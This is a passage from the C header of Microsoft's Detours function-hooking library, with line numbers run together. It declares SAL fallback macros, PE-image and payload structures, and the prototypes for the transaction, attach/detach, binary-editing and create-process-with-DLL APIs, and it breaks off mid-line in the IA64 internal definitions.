#ifndef _Inout_opt_ 195 | #define _Inout_opt_ 196 | #endif 197 | 198 | #ifndef _Inout_z_count_ 199 | #define _Inout_z_count_(x) 200 | #endif 201 | 202 | #ifndef _Out_ 203 | #define _Out_ 204 | #endif 205 | 206 | #ifndef _Out_opt_ 207 | #define _Out_opt_ 208 | #endif 209 | 210 | #ifndef _Out_writes_ 211 | #define _Out_writes_(x) 212 | #endif 213 | 214 | #ifndef _Outptr_result_maybenull_ 215 | #define _Outptr_result_maybenull_ 216 | #endif 217 | 218 | #ifndef _Writable_bytes_ 219 | #define _Writable_bytes_(x) 220 | #endif 221 | 222 | #ifndef _Readable_bytes_ 223 | #define _Readable_bytes_(x) 224 | #endif 225 | 226 | #ifndef _Success_ 227 | #define _Success_(x) 228 | #endif 229 | 230 | #ifndef _Pre_notnull_ 231 | #define _Pre_notnull_ 232 | #endif 233 | 234 | #ifdef DETOURS_INTERNAL 235 | 236 | #pragma warning(disable:4615) // unknown warning type (suppress with older compilers) 237 | 238 | #ifndef _Benign_race_begin_ 239 | #define _Benign_race_begin_ 240 | #endif 241 | 242 | #ifndef _Benign_race_end_ 243 | #define _Benign_race_end_ 244 | #endif 245 | 246 | #ifndef _Field_size_ 247 | #define _Field_size_(x) 248 | #endif 249 | 250 | #ifndef _Field_range_ 251 | #define _Field_range_(x,y) 252 | #endif 253 | 254 | #ifndef _Analysis_assume_ 255 | #define _Analysis_assume_(x) 256 | #endif 257 | 258 | #endif // DETOURS_INTERNAL 259 | #endif // DETOURS_DONT_REMOVE_SAL_20 260 | 261 | ////////////////////////////////////////////////////////////////////////////// 262 | // 263 | #ifndef GUID_DEFINED 264 | #define GUID_DEFINED 265 | typedef struct _GUID 266 | { 267 | DWORD Data1; 268 | WORD Data2; 269 | WORD Data3; 270 | BYTE Data4[ 8 ]; 271 | } GUID; 272 | 273 | #ifdef INITGUID 274 | #define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \ 275 | const GUID name \ 276 | = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } } 277 | #else 278 | #define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \ 279 | const GUID name 280 | #endif // INITGUID 281 | #endif // !GUID_DEFINED 282 | 283 | #if defined(__cplusplus) 284 | #ifndef _REFGUID_DEFINED 285 | #define _REFGUID_DEFINED 286 | #define REFGUID const GUID & 287 | #endif // !_REFGUID_DEFINED 288 | #else // !__cplusplus 289 | #ifndef _REFGUID_DEFINED 290 | #define _REFGUID_DEFINED 291 | #define REFGUID const GUID * const 292 | #endif // !_REFGUID_DEFINED 293 | #endif // !__cplusplus 294 | 295 | #ifndef ARRAYSIZE 296 | #define ARRAYSIZE(x) (sizeof(x)/sizeof(x[0])) 297 | #endif 298 | 299 | // 300 | ////////////////////////////////////////////////////////////////////////////// 301 | 302 | #ifdef __cplusplus 303 | extern "C" { 304 | #endif // __cplusplus 305 | 306 | /////////////////////////////////////////////////// Instruction Target Macros. 307 | // 308 | #define DETOUR_INSTRUCTION_TARGET_NONE ((PVOID)0) 309 | #define DETOUR_INSTRUCTION_TARGET_DYNAMIC ((PVOID)(LONG_PTR)-1) 310 | #define DETOUR_SECTION_HEADER_SIGNATURE 0x00727444 // "Dtr\0" 311 | 312 | extern const GUID DETOUR_EXE_RESTORE_GUID; 313 | extern const GUID DETOUR_EXE_HELPER_GUID; 314 | 315 | #define DETOUR_TRAMPOLINE_SIGNATURE 0x21727444 // Dtr! 316 | typedef struct _DETOUR_TRAMPOLINE DETOUR_TRAMPOLINE, *PDETOUR_TRAMPOLINE; 317 | 318 | /////////////////////////////////////////////////////////// Binary Structures. 319 | // 320 | #pragma pack(push, 8) 321 | typedef struct _DETOUR_SECTION_HEADER 322 | { 323 | DWORD cbHeaderSize; 324 | DWORD nSignature; 325 | DWORD nDataOffset; 326 | DWORD cbDataSize; 327 | 328 | DWORD nOriginalImportVirtualAddress; 329 | DWORD nOriginalImportSize; 330 | DWORD nOriginalBoundImportVirtualAddress; 331 | DWORD nOriginalBoundImportSize; 332 | 333 | DWORD nOriginalIatVirtualAddress; 334 | DWORD nOriginalIatSize; 335 | DWORD nOriginalSizeOfImage; 336 | DWORD cbPrePE; 337 | 338 | DWORD nOriginalClrFlags; 339 | DWORD reserved1; 340 | DWORD reserved2; 341 | DWORD reserved3; 342 | 343 | // Followed by cbPrePE bytes of data. 344 | } DETOUR_SECTION_HEADER, *PDETOUR_SECTION_HEADER; 345 | 346 | typedef struct _DETOUR_SECTION_RECORD 347 | { 348 | DWORD cbBytes; 349 | DWORD nReserved; 350 | GUID guid; 351 | } DETOUR_SECTION_RECORD, *PDETOUR_SECTION_RECORD; 352 | 353 | typedef struct _DETOUR_CLR_HEADER 354 | { 355 | // Header versioning 356 | ULONG cb; 357 | USHORT MajorRuntimeVersion; 358 | USHORT MinorRuntimeVersion; 359 | 360 | // Symbol table and startup information 361 | IMAGE_DATA_DIRECTORY MetaData; 362 | ULONG Flags; 363 | 364 | // Followed by the rest of the IMAGE_COR20_HEADER 365 | } DETOUR_CLR_HEADER, *PDETOUR_CLR_HEADER; 366 | 367 | typedef struct _DETOUR_EXE_RESTORE 368 | { 369 | DWORD cb; 370 | DWORD cbidh; 371 | DWORD cbinh; 372 | DWORD cbclr; 373 | 374 | PBYTE pidh; 375 | PBYTE pinh; 376 | PBYTE pclr; 377 | 378 | IMAGE_DOS_HEADER idh; 379 | union { 380 | IMAGE_NT_HEADERS inh; // all environments have this 381 | #ifdef IMAGE_NT_OPTIONAL_HDR32_MAGIC // some environments do not have this 382 | IMAGE_NT_HEADERS32 inh32; 383 | #endif 384 | #ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC // some environments do not have this 385 | IMAGE_NT_HEADERS64 inh64; 386 | #endif 387 | #ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC // some environments do not have this 388 | BYTE raw[sizeof(IMAGE_NT_HEADERS64) + 389 | sizeof(IMAGE_SECTION_HEADER) * 32]; 390 | #else 391 | BYTE raw[0x108 + sizeof(IMAGE_SECTION_HEADER) * 32]; 392 | #endif 393 | }; 394 | DETOUR_CLR_HEADER clr; 395 | 396 | } DETOUR_EXE_RESTORE, *PDETOUR_EXE_RESTORE; 397 | 398 | #ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC 399 | C_ASSERT(sizeof(IMAGE_NT_HEADERS64) == 0x108); 400 | #endif 401 | 402 | // The size can change, but assert for clarity due to the muddying #ifdefs. 403 | #ifdef _WIN64 404 | C_ASSERT(sizeof(DETOUR_EXE_RESTORE) == 0x688); 405 | #else 406 | C_ASSERT(sizeof(DETOUR_EXE_RESTORE) == 0x678); 407 | #endif 408 | 409 | typedef struct _DETOUR_EXE_HELPER 410 | { 411 | DWORD cb; 412 | DWORD pid; 413 | DWORD nDlls; 414 | CHAR rDlls[4]; 415 | } DETOUR_EXE_HELPER, *PDETOUR_EXE_HELPER; 416 | 417 | #pragma pack(pop) 418 | 419 | #define DETOUR_SECTION_HEADER_DECLARE(cbSectionSize) \ 420 | { \ 421 | sizeof(DETOUR_SECTION_HEADER),\ 422 | DETOUR_SECTION_HEADER_SIGNATURE,\ 423 | sizeof(DETOUR_SECTION_HEADER),\ 424 | (cbSectionSize),\ 425 | \ 426 | 0,\ 427 | 0,\ 428 | 0,\ 429 | 0,\ 430 | \ 431 | 0,\ 432 | 0,\ 433 | 0,\ 434 | 0,\ 435 | } 436 | 437 | /////////////////////////////////////////////////////////////// Helper Macros. 438 | // 439 | #define DETOURS_STRINGIFY(x) DETOURS_STRINGIFY_(x) 440 | #define DETOURS_STRINGIFY_(x) #x 441 | 442 | ///////////////////////////////////////////////////////////// Binary Typedefs. 443 | // 444 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_BYWAY_CALLBACK)( 445 | _In_opt_ PVOID pContext, 446 | _In_opt_ LPCSTR pszFile, 447 | _Outptr_result_maybenull_ LPCSTR *ppszOutFile); 448 | 449 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_FILE_CALLBACK)( 450 | _In_opt_ PVOID pContext, 451 | _In_ LPCSTR pszOrigFile, 452 | _In_ LPCSTR pszFile, 453 | _Outptr_result_maybenull_ LPCSTR *ppszOutFile); 454 | 455 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_SYMBOL_CALLBACK)( 456 | _In_opt_ PVOID pContext, 457 | _In_ ULONG nOrigOrdinal, 458 | _In_ ULONG nOrdinal, 459 | _Out_ ULONG *pnOutOrdinal, 460 | _In_opt_ LPCSTR pszOrigSymbol, 461 | _In_opt_ LPCSTR pszSymbol, 462 | _Outptr_result_maybenull_ LPCSTR *ppszOutSymbol); 463 | 464 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_COMMIT_CALLBACK)( 465 | _In_opt_ PVOID pContext); 466 | 467 | typedef BOOL (CALLBACK *PF_DETOUR_ENUMERATE_EXPORT_CALLBACK)(_In_opt_ PVOID pContext, 468 | _In_ ULONG nOrdinal, 469 | _In_opt_ LPCSTR pszName, 470 | _In_opt_ PVOID pCode); 471 | 472 | typedef BOOL (CALLBACK *PF_DETOUR_IMPORT_FILE_CALLBACK)(_In_opt_ PVOID pContext, 473 | _In_opt_ HMODULE hModule, 474 | _In_opt_ LPCSTR pszFile); 475 | 476 | typedef BOOL (CALLBACK *PF_DETOUR_IMPORT_FUNC_CALLBACK)(_In_opt_ PVOID pContext, 477 | _In_ DWORD nOrdinal, 478 | _In_opt_ LPCSTR pszFunc, 479 | _In_opt_ PVOID pvFunc); 480 | 481 | // Same as PF_DETOUR_IMPORT_FUNC_CALLBACK but extra indirection on last parameter. 482 | typedef BOOL (CALLBACK *PF_DETOUR_IMPORT_FUNC_CALLBACK_EX)(_In_opt_ PVOID pContext, 483 | _In_ DWORD nOrdinal, 484 | _In_opt_ LPCSTR pszFunc, 485 | _In_opt_ PVOID* ppvFunc); 486 | 487 | typedef VOID * PDETOUR_BINARY; 488 | typedef VOID * PDETOUR_LOADED_BINARY; 489 | 490 | //////////////////////////////////////////////////////////// Transaction APIs. 491 | // 492 | LONG WINAPI DetourTransactionBegin(VOID); 493 | LONG WINAPI DetourTransactionAbort(VOID); 494 | LONG WINAPI DetourTransactionCommit(VOID); 495 | LONG WINAPI DetourTransactionCommitEx(_Out_opt_ PVOID **pppFailedPointer); 496 | 497 | LONG WINAPI DetourUpdateThread(_In_ HANDLE hThread); 498 | 499 | LONG WINAPI DetourAttach(_Inout_ PVOID *ppPointer, 500 | _In_ PVOID pDetour); 501 | 502 | LONG WINAPI DetourAttachEx(_Inout_ PVOID *ppPointer, 503 | _In_ PVOID pDetour, 504 | _Out_opt_ PDETOUR_TRAMPOLINE *ppRealTrampoline, 505 | _Out_opt_ PVOID *ppRealTarget, 506 | _Out_opt_ PVOID *ppRealDetour); 507 | 508 | LONG WINAPI DetourDetach(_Inout_ PVOID *ppPointer, 509 | _In_ PVOID pDetour); 510 | 511 | BOOL WINAPI DetourSetIgnoreTooSmall(_In_ BOOL fIgnore); 512 | BOOL WINAPI DetourSetRetainRegions(_In_ BOOL fRetain); 513 | PVOID WINAPI DetourSetSystemRegionLowerBound(_In_ PVOID pSystemRegionLowerBound); 514 | PVOID WINAPI DetourSetSystemRegionUpperBound(_In_ PVOID pSystemRegionUpperBound); 515 | 516 | ////////////////////////////////////////////////////////////// Code Functions. 517 | // 518 | PVOID WINAPI DetourFindFunction(_In_ LPCSTR pszModule, 519 | _In_ LPCSTR pszFunction); 520 | PVOID WINAPI DetourCodeFromPointer(_In_ PVOID pPointer, 521 | _Out_opt_ PVOID *ppGlobals); 522 | PVOID WINAPI DetourCopyInstruction(_In_opt_ PVOID pDst, 523 | _Inout_opt_ PVOID *ppDstPool, 524 | _In_ PVOID pSrc, 525 | _Out_opt_ PVOID *ppTarget, 526 | _Out_opt_ LONG *plExtra); 527 | BOOL WINAPI DetourSetCodeModule(_In_ HMODULE hModule, 528 | _In_ BOOL fLimitReferencesToModule); 529 | 530 | ///////////////////////////////////////////////////// Loaded Binary Functions. 531 | // 532 | HMODULE WINAPI DetourGetContainingModule(_In_ PVOID pvAddr); 533 | HMODULE WINAPI DetourEnumerateModules(_In_opt_ HMODULE hModuleLast); 534 | PVOID WINAPI DetourGetEntryPoint(_In_opt_ HMODULE hModule); 535 | ULONG WINAPI DetourGetModuleSize(_In_opt_ HMODULE hModule); 536 | BOOL WINAPI DetourEnumerateExports(_In_ HMODULE hModule, 537 | _In_opt_ PVOID pContext, 538 | _In_ PF_DETOUR_ENUMERATE_EXPORT_CALLBACK pfExport); 539 | BOOL WINAPI DetourEnumerateImports(_In_opt_ HMODULE hModule, 540 | _In_opt_ PVOID pContext, 541 | _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile, 542 | _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK pfImportFunc); 543 | 544 | BOOL WINAPI DetourEnumerateImportsEx(_In_opt_ HMODULE hModule, 545 | _In_opt_ PVOID pContext, 546 | _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile, 547 | _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK_EX pfImportFuncEx); 548 | 549 | _Writable_bytes_(*pcbData) 550 | _Readable_bytes_(*pcbData) 551 | _Success_(return != NULL) 552 | PVOID WINAPI DetourFindPayload(_In_opt_ HMODULE hModule, 553 | _In_ REFGUID rguid, 554 | _Out_ DWORD *pcbData); 555 | 556 | _Writable_bytes_(*pcbData) 557 | _Readable_bytes_(*pcbData) 558 | _Success_(return != NULL) 559 | PVOID WINAPI DetourFindPayloadEx(_In_ REFGUID rguid, 560 | _Out_ DWORD * pcbData); 561 | 562 | DWORD WINAPI DetourGetSizeOfPayloads(_In_opt_ HMODULE hModule); 563 | 564 | ///////////////////////////////////////////////// Persistent Binary Functions. 565 | // 566 | 567 | PDETOUR_BINARY WINAPI DetourBinaryOpen(_In_ HANDLE hFile); 568 | 569 | _Writable_bytes_(*pcbData) 570 | _Readable_bytes_(*pcbData) 571 | _Success_(return != NULL) 572 | PVOID WINAPI DetourBinaryEnumeratePayloads(_In_ PDETOUR_BINARY pBinary, 573 | _Out_opt_ GUID *pGuid, 574 | _Out_ DWORD *pcbData, 575 | _Inout_ DWORD *pnIterator); 576 | 577 | _Writable_bytes_(*pcbData) 578 | _Readable_bytes_(*pcbData) 579 | _Success_(return != NULL) 580 | PVOID WINAPI DetourBinaryFindPayload(_In_ PDETOUR_BINARY pBinary, 581 | _In_ REFGUID rguid, 582 | _Out_ DWORD *pcbData); 583 | 584 | PVOID WINAPI DetourBinarySetPayload(_In_ PDETOUR_BINARY pBinary, 585 | _In_ REFGUID rguid, 586 | _In_reads_opt_(cbData) PVOID pData, 587 | _In_ DWORD cbData); 588 | BOOL WINAPI DetourBinaryDeletePayload(_In_ PDETOUR_BINARY pBinary, _In_ REFGUID rguid); 589 | BOOL WINAPI DetourBinaryPurgePayloads(_In_ PDETOUR_BINARY pBinary); 590 | BOOL WINAPI DetourBinaryResetImports(_In_ PDETOUR_BINARY pBinary); 591 | BOOL WINAPI DetourBinaryEditImports(_In_ PDETOUR_BINARY pBinary, 592 | _In_opt_ PVOID pContext, 593 | _In_opt_ PF_DETOUR_BINARY_BYWAY_CALLBACK pfByway, 594 | _In_opt_ PF_DETOUR_BINARY_FILE_CALLBACK pfFile, 595 | _In_opt_ PF_DETOUR_BINARY_SYMBOL_CALLBACK pfSymbol, 596 | _In_opt_ PF_DETOUR_BINARY_COMMIT_CALLBACK pfCommit); 597 | BOOL WINAPI DetourBinaryWrite(_In_ PDETOUR_BINARY pBinary, _In_ HANDLE hFile); 598 | BOOL WINAPI DetourBinaryClose(_In_ PDETOUR_BINARY pBinary); 599 | 600 | /////////////////////////////////////////////////// Create Process & Load Dll. 601 | // 602 | typedef BOOL (WINAPI *PDETOUR_CREATE_PROCESS_ROUTINEA)( 603 | _In_opt_ LPCSTR lpApplicationName, 604 | _Inout_opt_ LPSTR lpCommandLine, 605 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 606 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 607 | _In_ BOOL bInheritHandles, 608 | _In_ DWORD dwCreationFlags, 609 | _In_opt_ LPVOID lpEnvironment, 610 | _In_opt_ LPCSTR lpCurrentDirectory, 611 | _In_ LPSTARTUPINFOA lpStartupInfo, 612 | _Out_ LPPROCESS_INFORMATION lpProcessInformation); 613 | 614 | typedef BOOL (WINAPI *PDETOUR_CREATE_PROCESS_ROUTINEW)( 615 | _In_opt_ LPCWSTR lpApplicationName, 616 | _Inout_opt_ LPWSTR lpCommandLine, 617 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 618 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 619 | _In_ BOOL bInheritHandles, 620 | _In_ DWORD dwCreationFlags, 621 | _In_opt_ LPVOID lpEnvironment, 622 | _In_opt_ LPCWSTR lpCurrentDirectory, 623 | _In_ LPSTARTUPINFOW lpStartupInfo, 624 | _Out_ LPPROCESS_INFORMATION lpProcessInformation); 625 | 626 | BOOL WINAPI DetourCreateProcessWithDllA(_In_opt_ LPCSTR lpApplicationName, 627 | _Inout_opt_ LPSTR lpCommandLine, 628 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 629 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 630 | _In_ BOOL bInheritHandles, 631 | _In_ DWORD dwCreationFlags, 632 | _In_opt_ LPVOID lpEnvironment, 633 | _In_opt_ LPCSTR lpCurrentDirectory, 634 | _In_ LPSTARTUPINFOA lpStartupInfo, 635 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 636 | _In_ LPCSTR lpDllName, 637 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 638 | 639 | BOOL WINAPI DetourCreateProcessWithDllW(_In_opt_ LPCWSTR lpApplicationName, 640 | _Inout_opt_ LPWSTR lpCommandLine, 641 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 642 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 643 | _In_ BOOL bInheritHandles, 644 | _In_ DWORD dwCreationFlags, 645 | _In_opt_ LPVOID lpEnvironment, 646 | _In_opt_ LPCWSTR lpCurrentDirectory, 647 | _In_ LPSTARTUPINFOW lpStartupInfo, 648 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 649 | _In_ LPCSTR lpDllName, 650 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 651 | 652 | #ifdef UNICODE 653 | #define DetourCreateProcessWithDll DetourCreateProcessWithDllW 654 | #define PDETOUR_CREATE_PROCESS_ROUTINE PDETOUR_CREATE_PROCESS_ROUTINEW 655 | #else 656 | #define DetourCreateProcessWithDll DetourCreateProcessWithDllA 657 | #define PDETOUR_CREATE_PROCESS_ROUTINE PDETOUR_CREATE_PROCESS_ROUTINEA 658 | #endif // !UNICODE 659 | 660 | BOOL WINAPI DetourCreateProcessWithDllExA(_In_opt_ LPCSTR lpApplicationName, 661 | _Inout_opt_ LPSTR lpCommandLine, 662 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 663 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 664 | _In_ BOOL bInheritHandles, 665 | _In_ DWORD dwCreationFlags, 666 | _In_opt_ LPVOID lpEnvironment, 667 | _In_opt_ LPCSTR lpCurrentDirectory, 668 | _In_ LPSTARTUPINFOA lpStartupInfo, 669 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 670 | _In_ LPCSTR lpDllName, 671 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 672 | 673 | BOOL WINAPI DetourCreateProcessWithDllExW(_In_opt_ LPCWSTR lpApplicationName, 674 | _Inout_opt_ LPWSTR lpCommandLine, 675 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 676 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 677 | _In_ BOOL bInheritHandles, 678 | _In_ DWORD dwCreationFlags, 679 | _In_opt_ LPVOID lpEnvironment, 680 | _In_opt_ LPCWSTR lpCurrentDirectory, 681 | _In_ LPSTARTUPINFOW lpStartupInfo, 682 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 683 | _In_ LPCSTR lpDllName, 684 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 685 | 686 | #ifdef UNICODE 687 | #define DetourCreateProcessWithDllEx DetourCreateProcessWithDllExW 688 | #else 689 | #define DetourCreateProcessWithDllEx DetourCreateProcessWithDllExA 690 | #endif // !UNICODE 691 | 692 | BOOL WINAPI DetourCreateProcessWithDllsA(_In_opt_ LPCSTR lpApplicationName, 693 | _Inout_opt_ LPSTR lpCommandLine, 694 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 695 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 696 | _In_ BOOL bInheritHandles, 697 | _In_ DWORD dwCreationFlags, 698 | _In_opt_ LPVOID lpEnvironment, 699 | _In_opt_ LPCSTR lpCurrentDirectory, 700 | _In_ LPSTARTUPINFOA lpStartupInfo, 701 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 702 | _In_ DWORD nDlls, 703 | _In_reads_(nDlls) LPCSTR *rlpDlls, 704 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 705 | 706 | BOOL WINAPI DetourCreateProcessWithDllsW(_In_opt_ LPCWSTR lpApplicationName, 707 | _Inout_opt_ LPWSTR lpCommandLine, 708 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 709 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 710 | _In_ BOOL bInheritHandles, 711 | _In_ DWORD dwCreationFlags, 712 | _In_opt_ LPVOID lpEnvironment, 713 | _In_opt_ LPCWSTR lpCurrentDirectory, 714 | _In_ LPSTARTUPINFOW lpStartupInfo, 715 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 716 | _In_ DWORD nDlls, 717 | _In_reads_(nDlls) LPCSTR *rlpDlls, 718 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 719 | 720 | #ifdef UNICODE 721 | #define DetourCreateProcessWithDlls DetourCreateProcessWithDllsW 722 | #else 723 | #define DetourCreateProcessWithDlls DetourCreateProcessWithDllsA 724 | #endif // !UNICODE 725 | 726 | BOOL WINAPI DetourProcessViaHelperA(_In_ DWORD dwTargetPid, 727 | _In_ LPCSTR lpDllName, 728 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 729 | 730 | BOOL WINAPI DetourProcessViaHelperW(_In_ DWORD dwTargetPid, 731 | _In_ LPCSTR lpDllName, 732 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 733 | 734 | #ifdef UNICODE 735 | #define DetourProcessViaHelper DetourProcessViaHelperW 736 | #else 737 | #define DetourProcessViaHelper DetourProcessViaHelperA 738 | #endif // !UNICODE 739 | 740 | BOOL WINAPI DetourProcessViaHelperDllsA(_In_ DWORD dwTargetPid, 741 | _In_ DWORD nDlls, 742 | _In_reads_(nDlls) LPCSTR *rlpDlls, 743 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 744 | 745 | BOOL WINAPI DetourProcessViaHelperDllsW(_In_ DWORD dwTargetPid, 746 | _In_ DWORD nDlls, 747 | _In_reads_(nDlls) LPCSTR *rlpDlls, 748 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 749 | 750 | #ifdef UNICODE 751 | #define DetourProcessViaHelperDlls DetourProcessViaHelperDllsW 752 | #else 753 | #define DetourProcessViaHelperDlls DetourProcessViaHelperDllsA 754 | #endif // !UNICODE 755 | 756 | BOOL WINAPI DetourUpdateProcessWithDll(_In_ HANDLE hProcess, 757 | _In_reads_(nDlls) LPCSTR *rlpDlls, 758 | _In_ DWORD nDlls); 759 | 760 | BOOL WINAPI DetourUpdateProcessWithDllEx(_In_ HANDLE hProcess, 761 | _In_ HMODULE hImage, 762 | _In_ BOOL bIs32Bit, 763 | _In_reads_(nDlls) LPCSTR *rlpDlls, 764 | _In_ DWORD nDlls); 765 | 766 | BOOL WINAPI DetourCopyPayloadToProcess(_In_ HANDLE hProcess, 767 | _In_ REFGUID rguid, 768 | _In_reads_bytes_(cbData) PVOID pvData, 769 | _In_ DWORD cbData); 770 | BOOL WINAPI DetourRestoreAfterWith(VOID); 771 | BOOL WINAPI DetourRestoreAfterWithEx(_In_reads_bytes_(cbData) PVOID pvData, 772 | _In_ DWORD cbData); 773 | BOOL WINAPI DetourIsHelperProcess(VOID); 774 | VOID CALLBACK DetourFinishHelperProcess(_In_ HWND, 775 | _In_ HINSTANCE, 776 | _In_ LPSTR, 777 | _In_ INT); 778 | 779 | // 780 | ////////////////////////////////////////////////////////////////////////////// 781 | #ifdef __cplusplus 782 | } 783 | #endif // __cplusplus 784 | 785 | //////////////////////////////////////////////// Detours Internal Definitions. 786 | // 787 | #ifdef __cplusplus 788 | #ifdef DETOURS_INTERNAL 789 | 790 | #define NOTHROW 791 | // #define NOTHROW (nothrow) 792 | 793 | ////////////////////////////////////////////////////////////////////////////// 794 | // 795 | #if (_MSC_VER < 1299) 796 | #include 797 | typedef IMAGEHLP_MODULE IMAGEHLP_MODULE64; 798 | typedef PIMAGEHLP_MODULE PIMAGEHLP_MODULE64; 799 | typedef IMAGEHLP_SYMBOL SYMBOL_INFO; 800 | typedef PIMAGEHLP_SYMBOL PSYMBOL_INFO; 801 | 802 | static inline 803 | LONG InterlockedCompareExchange(_Inout_ LONG *ptr, _In_ LONG nval, _In_ LONG oval) 804 | { 805 | return (LONG)::InterlockedCompareExchange((PVOID*)ptr, (PVOID)nval, (PVOID)oval); 806 | } 807 | #else 808 | #pragma warning(push) 809 | #pragma warning(disable:4091) // empty typedef 810 | #include 811 | #pragma warning(pop) 812 | #endif 813 | 814 | #ifdef IMAGEAPI // defined by DBGHELP.H 815 | typedef LPAPI_VERSION (NTAPI *PF_ImagehlpApiVersionEx)(_In_ LPAPI_VERSION AppVersion); 816 | 817 | typedef BOOL (NTAPI *PF_SymInitialize)(_In_ HANDLE hProcess, 818 | _In_opt_ LPCSTR UserSearchPath, 819 | _In_ BOOL fInvadeProcess); 820 | typedef DWORD (NTAPI *PF_SymSetOptions)(_In_ DWORD SymOptions); 821 | typedef DWORD (NTAPI *PF_SymGetOptions)(VOID); 822 | typedef DWORD64 (NTAPI *PF_SymLoadModule64)(_In_ HANDLE hProcess, 823 | _In_opt_ HANDLE hFile, 824 | _In_ LPSTR ImageName, 825 | _In_opt_ LPSTR ModuleName, 826 | _In_ DWORD64 BaseOfDll, 827 | _In_opt_ DWORD SizeOfDll); 828 | typedef BOOL (NTAPI *PF_SymGetModuleInfo64)(_In_ HANDLE hProcess, 829 | _In_ DWORD64 qwAddr, 830 | _Out_ PIMAGEHLP_MODULE64 ModuleInfo); 831 | typedef BOOL (NTAPI *PF_SymFromName)(_In_ HANDLE hProcess, 832 | _In_ LPSTR Name, 833 | _Out_ PSYMBOL_INFO Symbol); 834 | 835 | typedef struct _DETOUR_SYM_INFO 836 | { 837 | HANDLE hProcess; 838 | HMODULE hDbgHelp; 839 | PF_ImagehlpApiVersionEx pfImagehlpApiVersionEx; 840 | PF_SymInitialize pfSymInitialize; 841 | PF_SymSetOptions pfSymSetOptions; 842 | PF_SymGetOptions pfSymGetOptions; 843 | PF_SymLoadModule64 pfSymLoadModule64; 844 | PF_SymGetModuleInfo64 pfSymGetModuleInfo64; 845 | PF_SymFromName pfSymFromName; 846 | } DETOUR_SYM_INFO, *PDETOUR_SYM_INFO; 847 | 848 | PDETOUR_SYM_INFO DetourLoadImageHlp(VOID); 849 | 850 | #endif // IMAGEAPI 851 | 852 | #if defined(_INC_STDIO) && !defined(_CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS) 853 | #error detours.h must be included before stdio.h (or at least define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS earlier) 854 | #endif 855 | #define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS 1 856 | 857 | #ifndef DETOUR_TRACE 858 | #if DETOUR_DEBUG 859 | #define DETOUR_TRACE(x) printf x 860 | #define DETOUR_BREAK() __debugbreak() 861 | #include 862 | #include 863 | #else 864 | #define DETOUR_TRACE(x) 865 | #define DETOUR_BREAK() 866 | #endif 867 | #endif 868 | 869 | #if 1 || defined(DETOURS_IA64) 870 | 871 | // 872 | // IA64 instructions are 41 bits, 3 per bundle, plus 5 bit bundle template => 128 bits per bundle. 873 | // 874 | 875 | #define DETOUR_IA64_INSTRUCTIONS_PER_BUNDLE (3) 876 | 877 | #define DETOUR_IA64_TEMPLATE_OFFSET (0) 878 | #define DETOUR_IA64_TEMPLATE_SIZE (5) 879 | 880 | #define DETOUR_IA64_INSTRUCTION_SIZE (41) 881 | #define DETOUR_IA64_INSTRUCTION0_OFFSET (DETOUR_IA64_TEMPLATE_SIZE) 882 | #define DETOUR_IA64_INSTRUCTION1_OFFSET (DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTION_SIZE) 883 | #define DETOUR_IA64_INSTRUCTION2_OFFSET (DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTION_SIZE + DETOUR_IA64_INSTRUCTION_SIZE) 884 | 885 | C_ASSERT(DETOUR_IA64_TEMPLATE_SIZE + 